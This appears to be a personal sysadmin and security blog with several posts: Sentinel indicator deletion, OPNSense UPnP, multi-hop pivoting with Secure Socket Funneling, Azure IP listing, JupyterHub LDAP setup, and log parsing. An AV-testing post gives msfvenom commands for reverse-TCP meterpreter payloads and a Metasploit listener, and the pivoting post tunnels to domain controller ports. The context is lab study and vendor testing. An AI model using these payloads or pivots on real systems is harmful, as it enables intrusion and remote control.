
Bulk Deleting Microsoft Sentinel Threat Intelligence Indicators by Source

Microsoft hasn't implemented a way to bulk delete indicators in Sentinel, which might be an issue if you have connected to a very noisy feed. This code runs in a Jupyter notebook; if you want to run it standalone you will need to change or remove tqdm (the progress bar). The progress bar doesn't show actual progress, it just moves to indicate "something" is happening.

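If you do want to run it standalone, here is a minimal sketch of the changes, assuming the rest of the script below is unchanged:

# Hypothetical standalone adaptation: use the terminal progress bar instead of
# the notebook one, and drive the top-level awaits with asyncio.run().
from tqdm import tqdm  # instead of: from tqdm.notebook import tqdm

async def main():
    r = httpx.post(api_target, headers=headers, json=json_body)
    await do_deletes(r.json())
    bar.close()

asyncio.run(main())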

I am not using the "nextLink" to iterate, as it doesn't seem to function correctly with the "queryIndicators" API endpoint. It's not an issue here, as each query should only return results that haven't been deleted yet.
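To illustrate the idea, a rough sketch of the resulting pagination pattern, using the same variables defined in the script below:

# Sketch only: re-issue the same query until nothing matching the source
# filter remains; deleted indicators simply stop appearing in the results.
while True:
    page = httpx.post(api_target, headers=headers, json=json_body).json()
    if not page.get("value"):
        break
    # ... delete everything in page["value"] ...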

The code "works" but there are a number of things that could be improved or fixed. I've succesfully used but I'd recommend understanding Python. Use at your own risk.

import pendulum
from msal import ConfidentialClientApplication
from tqdm.notebook import tqdm
import httpx
import random
import asyncio

client_secret = ""
client_id = ""
tenant_id = ""
api_version = "2024-01-01-preview"
subscription = ""
resource_group = ""
workspace = ""
sources_to_delete = []

api_target = f"https://management.azure.com/subscriptions/{subscription}/resourceGroups/{resource_group}/providers/Microsoft.OperationalInsights/workspaces/{workspace}/providers/Microsoft.SecurityInsights/threatIntelligence/main/queryIndicators?api-version={api_version}"
json_body = {
    "sources": sources_to_delete,
    "pageSize": 100,
}
token_issued = pendulum.now()
token_expires = token_issued.subtract(minutes=1)  # in the past, forcing an initial refresh
issued_token = None
seen_indicators = set()  # indicator IDs already queued for deletion

app = ConfidentialClientApplication(
    client_id, client_secret, authority=f"https://login.microsoftonline.com/{tenant_id}"
)


def get_token():
    global issued_token
    global token_expires

    if token_expires <= pendulum.now().add(minutes=5):
        print("Refreshing token.")
        issued_token = app.acquire_token_for_client(
            scopes=["https://management.azure.com/.default"]
        )
        token_expires = pendulum.now().add(seconds=issued_token["expires_in"])
        print(f"New expiry: {token_expires.to_iso8601_string()}")
    return issued_token

token = get_token()


def random_bar(bar):
    # Purely cosmetic: jump the bar to a random position to show activity.
    bar.n = random.randint(0, 100)
    bar.refresh()
    bar.set_description(random.choice(["Working hard", "Hardly working"]))


headers = {"Authorization": f"Bearer {get_token()['access_token']}"}


bar = tqdm(total=100)


async def delete_indicator(indicator):

    async with httpx.AsyncClient() as client:
        headers = {"Authorization": f"Bearer {get_token()['access_token']}"}

        r_delete = await client.delete(
            f"https://management.azure.com{indicator}?api-version={api_version}",
            headers=headers,
        )
        r_delete.raise_for_status()


async def gather_deletes(indicators):
    current_indicators = set()
    random_bar(bar)
    bar.set_description(f"Seen {len(seen_indicators)}")
    for indicator in indicators["value"]:
        if indicator["id"] in seen_indicators:
            continue
        seen_indicators.add(indicator["id"])
        current_indicators.add(indicator["id"])

    async with asyncio.TaskGroup() as tg:
        for indicator in current_indicators:
            tg.create_task(delete_indicator(indicator))


async def do_deletes(payload):
    await gather_deletes(payload)

    if "nextLink" in payload:
        # Re-issue the original query rather than following nextLink (see the
        # note above), refreshing the bearer token in case it expired mid-run.
        next_headers = {"Authorization": f"Bearer {get_token()['access_token']}"}
        r = httpx.post(api_target, headers=next_headers, json=json_body)

        await do_deletes(r.json())


r = httpx.post(api_target, headers=headers, json=json_body)

await do_deletes(r.json())
bar.close()

A correction to a previous note: indicators are not deleted or deactivated in the 'ThreatIntelligenceIndicator' table. You should ensure your retention period on the 'ThreatIntelligenceIndicator' table is 30 days. Once an indicator is removed it will no longer be updated in this table and will age out after that period. Existing indicators should continue to generate new entries in this table.
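If you want to confirm that behaviour, something like this sketch against the Log Analytics query API should do it (uses the azure-monitor-query package; the workspace GUID and source name are placeholders):

# Hypothetical check: watch when a purged source last wrote to the table.
from datetime import timedelta
from azure.identity import DefaultAzureCredential
from azure.monitor.query import LogsQueryClient

logs = LogsQueryClient(DefaultAzureCredential())
result = logs.query_workspace(
    workspace_id="<workspace-guid>",  # placeholder
    query="ThreatIntelligenceIndicator"
          " | where SourceSystem == 'MySource'"  # placeholder source name
          " | summarize LastSeen=max(TimeGenerated)",
    timespan=timedelta(days=30),
)
for table in result.tables:
    for row in table.rows:
        print(row)  # LastSeen should stop advancing once the source is purged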


OPNSense UPnP

Configuring UPnP on OPNSense for many is likely not as straightforward as installing the UPnP service.


While this may open more ports than strictly necessary, the following was my final state for functional UPnP.

1. Disable IGMP Snooping on your client network(s)

2. Install the UPnP plugin (os-upnp) from System->Firmware

3. Change UPnP to default-deny due to security issues

- Add an allow rule for the required hosts e.g. `allow 1024-65535 192.168.1.10 1024-65535`

4. Firewall->Rules->Your Client Network, add:

- Rule 1
  - Interface: Your client network interface
  - Direction: in
  - Protocol: UDP
  - Source: Clients requiring UPnP
  - Destination: 239.255.255.250/32
  - Destination Port: 1900

- Rule 2
  - Interface: Your client network interface
  - Direction: in
  - Protocol: UDP
  - Source: Clients requiring UPnP
  - Destination Port: 5351

- Rule 3
  - Interface: Your client network interface
  - Direction: in
  - Protocol: TCP
  - Source: Clients requiring UPnP
  - Destination Port: 2189

If this is a Windows device (I recommend limiting UPnP to gaming consoles), your antivirus firewall may be causing issues.

You also need to set static port mappings for the client devices in outbound NAT - use Hybrid NAT for the least impact on your network's security.


Multi-Host and OS Pivoting Using Secure Socket Funneling

During some recent self-study, I encountered a scenario where I wanted to use WinRM on a machine and couldn't from Kali due to the limitations of Powershell Core. The target machine was also two pivots deep, so I needed a way to move through those networks to connect to WinRM.


My VPN was running on Kali, and while I could disconnect it and switch to a Windows machine, I still wanted tools on Kali to be available.

Secure Socket Funneling (SSF) to the rescue.

But first, an example of what the environment looks like.

Network Layout

This is a sample of what the network looks like. Hopefully it's not too difficult to follow.

  • Windows Machine
    • VM Network 192.168.11.3
  • Kali Machine
    • VM Network 192.168.11.4
    • VPN Network 10.0.1.14
  • Target Environment Host A - Linux
    • External IP 10.0.0.100
    • Internal IP 172.16.1.100
  • Target Environment Host B - Windows - this machine is running OpenSSH.
    • Internal IP 172.16.1.5
  • Target Host C
    • Internal IP 172.16.2.20
  • Kali can connect to Host A only.
  • Host A can connect to Host B only.
  • Host A is firewalled and can't listen on any extra ports on 10.0.0.100.

Setting up the SSF Daemons

SSF binaries: https://securesocketfunneling.github.io/ssf/#download

Host B

We need to get SSF onto the machine, so grab the Windows binaries from the SSF website. We can copy these over using SCP.

To do this, we need to jump via Host A. Assuming we have some way of unzipping on the Windows machine, perform the following:

scp -J root@10.0.0.100 ./ssf-windows.zip user@172.16.1.5:

If we don't have an easy way to unzip the file, you can recursively copy the extracted directory over using the following:

scp -r -J root@10.0.0.100 ./ssf-windows/extracted/ user@172.16.1.5:

If the host weren't running OpenSSH, you would need to use another method, such as WinRM, following this same process.

Once complete, we can now ssh in and set up the daemon by doing the following:

ssh -J root@10.0.0.100 user@172.16.1.5

Then kick off the ssfd daemon to listen on port 63000:

Expand-Archive ssf-windows.zip
cd .\extracted
.\ssfd -p 63000

Host A

For Host A, grab the Linux binaries and copy them over. This process is the same as for Host B but without the jump host '-J' option.

In this scenario, due to the firewall, we only listen on localhost.

scp ./ssf-linux.zip root@10.0.0.100:
ssh root@10.0.0.100
./ssfd -p 63000 -l 127.0.0.1

Kali Machine

Since we need to get the traffic through to Host A, we'll use ssh local port forwarding to get around the firewall issue.

The below command sets up ssh to listen on 1111 and forward it to 63000 on Host A:

ssh -L 1111:127.0.0.1:63000 root@10.0.0.100

Now we set up ssfd on our Kali host. Unzip SSF on Kali and from within the extracted folder run:

./ssfd -p 63000

If you have an SSH server running on your Kali host, you could use SSH forwarding from Windows, but I think that's a bit messier.

Windows Machine

SSF supports routing via several intermediate hosts. To do this, we configure the below JSON config file:

{
  "ssf": {
    "circuit": [
      {"host": "192.168.11.4", "port": "63000"},
      {"host": "127.0.0.1", "port": "1111"}
    ]
  }
}

This config does the following:

  1. Connects to Kali
  2. Connects to Host A via localhost on Kali (the SSH local port forward)

Info on configuring the relay hosts can be found at https://securesocketfunneling.github.io/ssf/#how-to-use-relay-servers

Host B is the last hop, so we don't need it in the config. To connect, we run the following:

.\ssf.exe -c config.json -D 9000 -p 63000 172.16.1.5

We now have dynamic port forwarding on the Windows machine listening on port 9000, which is essentially a SOCKS proxy. Dynamic port forwarding isn't necessarily what we want, though, as we need WinRM. With SSF, you can perform both TCP and UDP forwarding.
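If the SOCKS listener is all you need, tools can point straight at it. As a hypothetical check from Python (requires PySocks, e.g. the requests[socks] extra; the target IP is Host C from the layout above):

# socks5h resolves DNS on the far side of the tunnel.
import requests

proxies = {
    "http": "socks5h://127.0.0.1:9000",
    "https": "socks5h://127.0.0.1:9000",
}
print(requests.get("http://172.16.2.20", proxies=proxies, timeout=10).status_code)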

We can set up SSF to forward to the WinRM HTTP port on 5985:

.\ssf.exe -c .\config.json -L 6666:172.16.2.20:5985 172.16.1.5 -p 63000

And now we can finally connect to WinRM:

$s = New-PSSession -Port 6666 -ComputerName 127.0.0.1 -Credential 'username'
Enter-PSSession $s
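As an aside, if you'd rather stay in Python for this, a library like pypsrp should work against the same forwarded port. A rough sketch (the credentials and NTLM auth choice are assumptions):

# Hypothetical pypsrp session over the SSF forward (pip install pypsrp).
from pypsrp.client import Client

client = Client(
    "127.0.0.1",
    port=6666,            # the local SSF forward to WinRM HTTP (5985)
    ssl=False,
    auth="ntlm",          # assumption: NTLM is enabled on the target
    username="username",
    password="password",
)
stdout, stderr, rc = client.execute_cmd("whoami")
print(stdout)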

Local UDP/TCP Forwarding Example and Notes

I don't think it's evident in the SSF docs, but you can perform multiple forwards much like SSH, and you can forward both UDP and TCP for the same port.

Here's an example of forwarding a set of Domain Controller ports through to Kali. Many of the UDP forwards aren't required, but I assembled this with regex and it was easier to include them all.

./ssf  -L 445:172.16.2.5:445 -U 445:172.16.2.5:445 -L 636:172.16.2.5:636 -U 636:172.16.2.5:636 -L 389:172.16.2.5:389 -U 389:172.16.2.5:389 -L 464:172.16.2.5:464 -U 464:172.16.2.5:464 -L 139:172.16.2.5:139 -U 139:172.16.2.5:139 -L 135:172.16.2.5:135 -U 135:172.16.2.5:135 -L 593:172.16.2.5:593 -U 593:172.16.2.5:593 -L 3268:172.16.2.5:3268 -U 3268:172.16.2.5:3268 -L 3269:172.16.2.5:3269 -U 3269:172.16.2.5:3269 -L 88:172.16.2.5:88 -U 88:172.16.2.5:88 -L 137:172.16.2.5:137 -U 138:172.16.2.5:138  -p 63000 172.16.1.20

With the above, you could run enum4linux or crackmapexec against 127.0.0.1. Note that some commands that talk to Kerberos may also need a DC IP; check your command's options and, if required, set that to 127.0.0.1 as well.

And that's it.

The SSF docs are available at https://securesocketfunneling.github.io/ssf/#home

Depending on the environment, a lot of this can be achieved using SSH forwarding.


Extracting Public IPs from an Azure Tenant

A one-liner that extracts all Public IPs (PIPs) assigned in your Azure tenant.

Note that this only covers PIPs, and not address prefixes and other resources, though you can easily modify the command to output those.

# Output to console
Get-AzSubscription | ForEach-Object {Set-AzContext -Subscription $_.Name *>$null; Get-AzPublicIpAddress} | Where-Object {$_.IpAddress -ne 'Not Assigned'} | Select-Object -Property Name,PublicIpAllocationMethod,ipAddress,ProvisioningState,Location,ResourceGroupName,Id

and

# Write to CSV
Get-AzSubscription | ForEach-Object {Set-AzContext -Subscription $_.Name *>$null; Get-AzPublicIpAddress} | Where-Object {$_.IpAddress -ne 'Not Assigned'} | Select-Object -Property Name,PublicIpAllocationMethod,ipAddress,ProvisioningState,Location,ResourceGroupName,Id  | Export-Csv -Path .\pips.txt
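If PowerShell isn't an option, a rough Python equivalent using the Azure SDK might look like this (assumes azure-identity, azure-mgmt-resource and azure-mgmt-network are installed):

# Sketch: enumerate every subscription, then list assigned PIPs in each.
from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import SubscriptionClient
from azure.mgmt.network import NetworkManagementClient

credential = DefaultAzureCredential()

for sub in SubscriptionClient(credential).subscriptions.list():
    network = NetworkManagementClient(credential, sub.subscription_id)
    for pip in network.public_ip_addresses.list_all():
        if pip.ip_address:  # skip unassigned PIPs
            print(pip.name, pip.ip_address, pip.location, pip.provisioning_state)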

Setting up JupyterHub for AD (or LDAP) Authentication

Covering basic config for AD and Jupyter

This is reasonably straightforward, though you might get caught out by an issue with the following setting:

c.LDAPAuthenticator.bind_dn_template

Here is the config

c.LDAPAuthenticator.lookup_dn_search_user = 'service_account'
c.LDAPAuthenticator.lookup_dn_search_password = 'password'
c.JupyterHub.authenticator_class = 'ldapauthenticator.LDAPAuthenticator'
c.LDAPAuthenticator.server_address = 'ldap://server'
c.LDAPAuthenticator.bind_dn_template = 'domain\\{username}'
c.LDAPAuthenticator.lookup_dn = False
c.LDAPAuthenticator.user_search_base = 'OU=Corporate Services,OU=Users,OU=Agencies,DC=domain,DC=sub,DC=tld'
c.LDAPAuthenticator.user_attribute = 'sAMAccountName'
c.LDAPAuthenticator.allowed_groups = []
c.Spawner.default_url = '/lab'
c.Spawner.notebook_dir = '~'
c.JupyterHub.spawner_class = 'systemdspawner.SystemdSpawner'
c.SystemdSpawner.default_shell = '/usr/bin/zsh'
c.SystemdSpawner.username_template = 'jupyter-{username}'
c.SystemdSpawner.unit_name_template = 'jupyter-singleuser'
c.SystemdSpawner.disable_user_sudo = False
c.SystemdSpawner.dynamic_users = True

def start_user(spawner):
    # Create a per-user notebook directory owned by that user on first spawn.
    import os, pwd, grp
    username = spawner.user.name
    path = os.path.join('/usr/share/notebooks', username)
    if not os.path.exists(path):
        os.mkdir(path, 0o755)
        uid = pwd.getpwnam(username).pw_uid
        gid = grp.getgrnam(username).gr_gid
        os.chown(path, uid, gid)

# Assumption: start_user was intended to run before each spawn, so register it.
c.Spawner.pre_spawn_hook = start_user

Testing AVs With Simple Vectors

Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.


To kick off I generated a basic executable meterpreter with simple encoding and no encryption.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.1.1.2 LPORT=4444 -o meterpreter.exe -f exe --encoder x64/xor_dynamic --platform windows --arch x64 

The options used are:

  • -p the payload to use.

  • LHOST & LPORT – the Metasploit options, set within msf using "set OPTION value". In this case, the attacking host and attacking port, because all payloads used are reverse TCP payloads (the victim host connects back to the attacking machine, as opposed to the attacking machine connecting to the victim).

  • -o the output file.

  • -f the format to use. Use raw when generating script payloads (or the language name, e.g. python) to get the native code. There are options to transform payloads, but I will not be covering this.

  • --platform the target platform. Generally not needed for scripting languages like Python.

  • --arch the target platform architecture. Generally not needed for scripting languages like Python.

Within Metasploit, I kicked off the listener. This is common to all generated payloads, so I will not repeat it; just note that the payload and port will need to change depending on what is generated with msfvenom.

use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444

As expected, this was detected without issue; no surprise there.

I generated a few more payloads using various languages. A lot of these can be shimmed into the environment without requiring an install, making them viable vectors.

Java – detected – requires a JVM or JDK. Execute with java -jar file.jar

msfvenom -f raw -p java/meterpreter/reverse_tcp LHOST=10.1.1.2 LPORT=4443 -o payload.jar

Parsing Arbitrary Log Data for Logs Per Second and Size Data

I recently encountered a scenario requiring me to parse some data that was not available during a proof-of-concept and in a non-standard format. There may be a multitude of tools and approaches to achieve this but the fastest I could think of at the time was by using Python.


Here are the steps I took to begin processing this data.

  1. Analyse the log source data and figure out what contents I needed to achieve my objective.

    • The file structure made this easy as a single day was represented in the filename. Luckily my use case didn’t require localising the timezone as the data was in UTC.
      FileName.@2020010100001TZDATA.extension

  2. My next step was to analyse the file contents to work out what data I needed and where it was.

    • Super simple – the timestamp I needed was the first space-delimited field of each line:
      1560053187.668 ....
      There was some extra data in each file’s header describing the source and structure, prefixed with a #

Well, that was easy; even if it wasn't, we would have found a way with the power of Python.
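As a quick sanity check of the format, Python's datetime handles that epoch value directly (sample value from above; note that fromtimestamp() returns local time, which was fine here):

from datetime import datetime

# The fractional part is milliseconds and is preserved in the result.
print(datetime.fromtimestamp(1560053187.668))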

Let’s get started.

# I didn't know I'd need these imports when I started, so don't be deterred.
from datetime import datetime
from collections import Counter
from statistics import mean
import operator

# Definitely knew I needed these.
import os
import re
import csv
import sys

# I'm going to regex the filenames for the specified date, so I'll compile a regex match.
file_match = re.compile(r'^FileName\.@20190610.*') # Starts with FileName.@ + Date I Want + Whatever

# The data I needed was in two folders so I created an array with the paths in case I needed to re-use the code.
data_folders = ['X:/Folder1', 'X:/Folder2']

# Set the file size count to zero.
total_size = 0

# Because I want data_folders to be the only variable you need to define, I set up a dict to add the folders to. I will later use this dict to perform all my operations. I really need to learn pandas.
directories = {}

So we’ve set up everything we need to reference the data and work with what we need. Now we have to start iterating, matching, and all that fun stuff.

# Move through folders
for data_folder in data_folders:
    # Add the folder dict to the root dict gigitty
    directories[data_folder] = {}
    # List folder contents
    for file in os.listdir(data_folder):
        # Get files matching our defined string
        if file_match.match(file):
            # Add the matched file's size to the total size
            total_size += os.path.getsize(data_folder+'/'+file)
            # Open the file for reading
            with open(data_folder+'/'+file) as logfile:
                # Read as CSV
                time_line = csv.reader(logfile, delimiter=' ')
                # Set base values for iterations
                second = 0
                count = 0
                # Compile matches once to check entries against and avoid weird s!*%
                comment_match = re.compile('^#.*')
                int_match = re.compile(r'^\d.*')
                # Iterate through each row in file
                for row in time_line:
                    # Check the line against the above matches
                    if not comment_match.match(row[0]) and int_match.match(row[0]):
                        # Convert the UNIX epoch to a datetime object first,
                        # then build the timestamp string from it
                        dt = datetime.fromtimestamp(float(row[0]))
                        current_time = "{0}:{1}:{2}".format(dt.hour, dt.minute, dt.second)
                        # If we're still within the same second keep counting;
                        # otherwise store the count and reset for the new second
                        if second == dt.second:
                            count += 1
                        else:
                            directories[data_folder][current_time] = count
                            second = dt.second
                            count = 0
# Create an empty Counter object and then start adding the calculated data together.
second_count_results = Counter({})
for directory, times in directories.items():
    second_count_results += Counter(times)

# Calculate the total size of the logs together (bytes to MB).
total_log_size_mb = total_size * 0.000001
    
# Max logs per second that we encountered.
max_lps = max(second_count_results.items(), key=operator.itemgetter(1))[1]
# Minimum logs per second that we encountered.
min_lps = min(second_count_results.items(), key=operator.itemgetter(1))[1]
# Find the average LPS.
list_of_lps = [v for k, v in second_count_results.items()]
average_lps = mean(list_of_lps)


# Print to stdout the data we figured out in our heads.
print('Max lps observed: ' + str(max_lps) + ' min lps observed: ' + str(min_lps))
print('Size of the data we calculated (MB): ' + str(total_log_size_mb))
print('Average LPS was: ' + str(average_lps))

# Print and save the results.
with open('proxy_lps_data.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    for increment in sorted(second_count_results.items()):
        timestamp = str(increment[0])
        count = str(increment[1])
        writer.writerow([timestamp, str(count)])
        print(timestamp + ': ' +  str(count))

# Save the calculation metadata.
with open('proxy_metrics_data.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerow(['size', str(total_log_size_mb)])
    writer.writerow(['min_lps', str(min_lps)])
    writer.writerow(['max_lps', str(max_lps)])
    writer.writerow(['avg_lps', str(average_lps)])